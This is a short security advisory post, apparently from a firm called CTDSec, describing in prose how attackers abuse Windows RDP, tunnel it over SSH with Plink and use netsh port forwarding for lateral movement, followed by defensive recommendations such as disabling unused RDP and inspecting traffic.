Remote Desktop Protocol (RDP) is a Windows component designed to provide administrators and users with a remote path to their systems. A group of malicious hackers have been abusing this feature to attack vulnerable systems, since sometimes this kind of attacks can be more difficult to detect than a backdoor.
“Malicious users resort to the use of RDP due to their stability and functionality over a backdoor. Hackers use the native Windows RDP functions to connect laterally through systems in compromised environments. ”
Access to a system via RDP allows attackers to gain persistence, although it depends on an additional attack vector to enter the compromised system, such as a phishing attack, for example. In addition, attackers have increasingly resorted to ‘tunneling the network’ and port forwarding based on the host.
Thanks to this, attackers can establish a connection to a remote server blocked by a firewall to exploit that connection and use it as a means of transport to ‘dig a tunnel’ to local services through the firewall.
One utility that is used to pipe RDP sessions is PuTTY Link, or Plink, which allows attackers to establish SSH connections to other systems. According to our network security experts, since many environments do not inspect protocols or block SSH communications from their network, attackers can use the tool to create encrypted tunnels and establish RDP connections with C & C.
On the other hand, RDP sessions also allow attackers to move laterally through an environment; attackers can use the native shell command in Windows Network (netsh) to use the RDP port forwarding to discover segmented networks.
Our solutions to that issues from CTDSec group:
– Host and network prevention and detection mechanisms must provide organizations with the necessary defenses to mitigate this
kind of attacks
– Disable RDP when not in use, enabling host firewall rules to prohibit incoming RDP connections are useful tips to reinforce risk prevention.
– At the network level, administrators must enforce RDP connections from a designated mailbox or central administration server, prevent privileged RDP accounts from being used, review firewall rules to identify port forwarding vulnerabilities, and inspect traffic content of network.